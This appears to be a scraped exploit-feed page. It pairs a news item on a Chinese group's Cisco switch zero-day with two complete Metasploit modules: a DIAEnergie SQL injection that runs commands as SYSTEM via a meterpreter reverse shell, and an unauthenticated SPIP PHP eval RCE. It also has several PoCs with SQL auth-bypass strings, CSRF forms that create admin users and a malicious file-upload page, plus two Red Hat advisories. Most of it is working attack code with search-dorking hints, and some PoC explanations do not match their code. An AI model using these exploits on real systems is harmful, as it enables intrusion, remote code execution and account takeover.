Details have emerged about a China-nexus threat group's exploitation of a recently disclosed, now-patched security flaw in Cisco switches as a zero-day to seize control of the appliance and evade detection.
The activity, attributed to Velvet Ant, was observed early this year and involved the weaponization of CVE-2024-20399 (CVSS score: 6.0) to deliver bespoke malware and gain extensive control

Network Security / Zero-Day

Details have emerged about a China-nexus threat group's exploitation of a recently disclosed, now-patched security flaw in Cisco switches as a zero-day to seize control of the appliance and evade detection.

The activity, attributed to Velvet Ant, was observed early this year and involved the weaponization of CVE-2024-20399 (CVSS score: 6.0) to deliver bespoke malware and gain extensive control over the compromised system, facilitating both data exfiltration and persistent access.

"The zero-day exploit allows an attacker with valid administrator credentials to the Switch management console to escape the NX-OS command line interface (CLI) and execute arbitrary commands on the Linux underlying operating system," cybersecurity company Sygnia said in a report shared with The Hacker News.

Velvet Ant first caught the attention of researchers at the Israeli cybersecurity company in connection with a multi-year campaign that targeted an unnamed organization located in East Asia by leveraging legacy F5 BIG-IP appliances as a vantage point for setting up persistence on the compromised environment.

The threat actor's stealthy exploitation of CVE-2024-20399 came to light early last month, prompting Cisco to issue security updates to release the flaw.

Notable among the tradecraft is the level of sophistication and shape-shifting tactics adopted by the group, initially infiltrating new Windows systems before moving to legacy Windows servers and network devices in an attempt to fly under the radar.

"The transition to operating from internal network devices marks yet another escalation in the evasion techniques used in order to ensure the continuation of the espionage campaign," Sygnia said.

The latest attack chain entails breaking into a Cisco switch appliance using CVE-2024-20399 and conducting reconnaissance activities, subsequently pivoting to more network devices and ultimately executing a backdoor binary by means of a malicious script.

The payload, dubbed VELVETSHELL, is an amalgamation of two open-source tools, a Unix backdoor named Tiny SHell and a proxy utility called 3proxy. It also supports capabilities to execute arbitrary commands, download/upload files, and establish tunnels for proxying network traffic.

"The modus-operandi of 'Velvet Ant' highlights risks and questions regarding third-party appliances and applications that organizations onboard," the company said. "Due to the 'black box' nature of many appliances, each piece of hardware or software has the potential to turn into the attack surface that an adversary is able to exploit."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control

This Metasploit module exploit a remote SQL injection vulnerability in the CBEC service of DIAEnergie versions 1.10 and below from Delta Electronics. The commands will get executed in the context of NT AUTHORITY\SYSTEM.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',        'Description' => %q{          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'Michael Heinzl', # MSF exploit          'Tenable' # Discovery & PoC        ],        'References' => [          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],          [ 'CVE', '2024-4548']        ],        'DisclosureDate' => '2024-05-06',        'Platform' => 'win',        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              },              'Type' => :win_fetch            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(928)      ]    )  end  # Determine if the DIAEnergie version is vulnerable  def check    begin      connect      sock.put 'Who is it?'      res = sock.get || ''    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e      vprint_error(e.message)      return Exploit::CheckCode::Unknown    ensure      disconnect    end    if res.empty?      vprint_status('Received an empty response.')      return Exploit::CheckCode::Unknown    end    vprint_status('Who is it response: ' + res.to_s)    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/    version = res.match(version_pattern)    if version[0].nil?      Exploit::CheckCode::Detected    end    vprint_status('Version retrieved: ' + version[0])    unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610')      return CheckCode::Safe    end    return CheckCode::Appears  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    scname = Rex::Text.rand_text_alphanumeric(5..10).to_s    vprint_status('Using random script name: ' + scname)    year = rand(2024..2026)    month = sprintf('%02d', rand(1..12))    day = sprintf('%02d', rand(1..29))    random_date = "#{year}-#{month}-#{day}"    vprint_status('Using random date: ' + random_date)    hour = sprintf('%02d', rand(0..23))    minute = sprintf('%02d', rand(0..59))    second = sprintf('%02d', rand(0..59))    random_time = "#{hour}:#{minute}:#{second}"    vprint_status('Using random time: ' + random_time)    # Inject payload    begin      print_status('Sending SQL injection...')      connect      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"      res = sock.get      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)      end      vprint_status('Injection - Expected response received: ' + res.to_s)      disconnect      # Trigger      print_status('Triggering script execution...')      connect      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"      res = sock.get      unless res.to_s == 'Recalculate Script Start!'        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)      end      vprint_status('Trigger - Expected response received: ' + res.to_s)      disconnect      print_good('Script successfully injected, check thy shell.')    ensure      # Cleanup      print_status('Cleaning up database...')      connect      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"      res = sock.get      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)      end      vprint_status('Cleanup - Expected response received: ' + res.to_s)      disconnect    end  endend

DIAEnergie 1.10 SQL Injection

This Metasploit module exploits a remote code execution vulnerability in SPIP versions up to and including 4.2.12. The vulnerability occurs in SPIP's templating system where it incorrectly handles user-supplied input, allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a payload manipulating the templating data processed by the echappe_retour() function, invoking traitements_previsu_php_modeles_eval(), which contains an eval() call.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin',        'Description' => %q{          This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.          The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,          allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a          payload manipulating the templating data processed by the `echappe_retour()` function, invoking          `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.        },        'Author' => [          'Valentin Lobstein',  # Metasploit module author          'Laluka',             # Vulnerability discovery          'Julien Voisin'       # Review        ],        'License' => MSF_LICENSE,        'References' => [          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']        ],        'Platform' => ['php', 'unix', 'linux', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory', {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell', {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell', {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2024-08-16',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def check    uri = normalize_uri(target_uri.path, 'spip.php')    res = send_request_cgi({ 'uri' => uri.to_s })    return Exploit::CheckCode::Unknown('Target is unreachable.') unless res    return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text    return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/    version = ::Regexp.last_match(1)    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/      version = ::Regexp.last_match(1)    end    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version    print_status("SPIP Version detected: #{version}")    if Rex::Version.new(version) > Rex::Version.new('4.2.12')      return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")    end    return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")  end  def php_exec_cmd(encoded_payload)    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)    shell = <<-END_OF_PHP_CODE        #{php_preamble(disabled_varname: dis)}        $c = base64_decode("#{encoded_clean_payload}");        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE    return shell  end  def exploit    print_status('Preparing to send exploit payload to the target...')    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)    b64_payload = framework.encoders.create('php/base64').encode(phped_payload)    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"    print_status('Sending exploit payload to the target...')    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'spip.php'),      'vars_get' => {        'action' => 'porte_plume_previsu'      },      'data' => "data=#{payload}"    })  endend

SPIP 4.2.12 Remote Code Execution

AVMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AVMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/07/Apartment-Visitors-Management-System-Project.zip                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/AVMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AVMS Project 1.0 SQL Injection

Online Survey System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Survey System 1.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/survey/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Survey System 1.0 Cross Site Request Forgery

Online Shopping System Master version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : online shopping system master v1.0 CSRF Vulnerability                                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adduser.php.

[+] save code as poc.html .

<div class="card">  
                <div class="card-header card-header-primary">  
                  <h4 class="card-title">Add Users</h4>  
                  <p class="card-category">Complete User profile</p>  
                </div>  
                <div class="card-body">  
                  <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
                    <div class="row">

                            </div>  
                      </div>  
                    </div>  
                    <div class="row">  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Email</label>  
                          <input type="email" name="email" id="email" class="form-control" required="">  
                        </div>  
                      </div>  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Password</label>  
                          <input type="password" id="password" name="password" class="form-control" required="">  
                        </div>  
                      </div>

                                        <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
                    <div class="clearfix"></div>  
                  </form>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Shopping System Master 1.0 Cross Site Request Forgery

Online Banking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload PHP malicious files directly.

    [+] Here’s a breakdown of its components and functionality:

    HTML Structure:  
        DOCTYPE & <html>: Defines the document type and language.  
        <head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.  
        <body>: Contains the main content of the page.

    Form Elements:  
        <form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.  
        <label> and <input> fields: Collect information from the user:  
            Target IP: IP address where the file will be uploaded.  
            Attacker IP: The IP address of the attacker (though this field is not used in the script).  
            Attacker Port: The port number of the attacker (not used in the script).  
            File Input: Allows the user to select a file to upload.  
        <button>: A button that triggers the file upload process when clicked.

    JavaScript Functionality:  
        uploadFile(): Function executed when the "Upload File" button is clicked.  
            Collects input values: Retrieves values from the input fields and the selected file.  
            Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.  
            FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').  
            fetch API: Sends a POST request to the target IP with the file attached:  
                URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings  
                Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.

    Security Note:  
        Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused.   
    It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.

[+] Line 45 set url of target.

[+] Choose the target IP .

[+] Put any IP address of your own .

[+] Put any port .

[+] The path to upload the files : http://localhost/banking/uploads/

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Direct File Upload</title>  
</head>  
<body>

    <h2>Direct File Upload</h2>  
    <form id="uploadForm">  
        <label for="targetIP">Target IP:</label>  
        <input type="text" id="targetIP" name="targetIP" required><br><br>

        <label for="attackerIP">Attacker IP:</label>  
        <input type="text" id="attackerIP" name="attackerIP" required><br><br>

        <label for="attackerPort">Attacker Port:</label>  
        <input type="number" id="attackerPort" name="attackerPort" required><br><br>

        <label for="fileInput">Select File:</label>  
        <input type="file" id="fileInput" name="fileInput" required><br><br>

        <button type="button" onclick="uploadFile()">Upload File</button>  
    </form>

    <script>  
        function uploadFile() {  
            const targetIP = document.getElementById('targetIP').value;  
            const attackerIP = document.getElementById('attackerIP').value;  
            const attackerPort = document.getElementById('attackerPort').value;  
            const fileInput = document.getElementById('fileInput').files[0];

            if (!targetIP || !attackerIP || !attackerPort || !fileInput) {  
                alert('Please fill in all fields and select a file.');  
                return;  
            }

            const formData = new FormData();  
            formData.append('name', 'PWNED');  
            formData.append('img', fileInput);

            console.log("(+) Uploading file...");

            fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {  
                method: 'POST',  
                body: formData  
            })  
            .then(response => response.text())  
            .then(data => {  
                if (data === '1') {  
                    console.log("(+) File upload seems to have been successful!");  
                } else {  
                    console.log("(-) Oh no, the file upload seems to have failed!");  
                }  
            })  
            .catch(error => console.error("(-) Error during file upload:", error));  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Arbitrary File Upload

Online ID Generator version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online ID Generator 1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/id_generator/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online ID Generator 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-5749-03 - The components for Red Hat OpenShift for Windows Containers 10.16.1 are now available.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5749.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.16.1 product releaseAdvisory ID:        RHSA-2024:5749-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5749Issue date:         2024-08-22Revision:           03CVE Names:          ====================================================================Summary: The components for Red Hat OpenShift for Windows Containers 10.16.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#moderatehttps://issues.redhat.com/browse/OCPBUGS-37609

Red Hat Security Advisory 2024-5749-03

Red Hat Security Advisory 2024-5745-03 - The components for Red Hat OpenShift for Windows Containers 10.15.3 are now available.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5745.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat OpenShift for Windows Containers 10.15.3 product release  
Advisory ID:        RHSA-2024:5745-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5745  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

The components for Red Hat OpenShift for Windows Containers 10.15.3 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/OCPBUGS-33875  
https://issues.redhat.com/browse/OCPBUGS-37533  
https://issues.redhat.com/browse/OCPBUGS-38485  
https://issues.redhat.com/browse/WINC-1289

Tag

#windows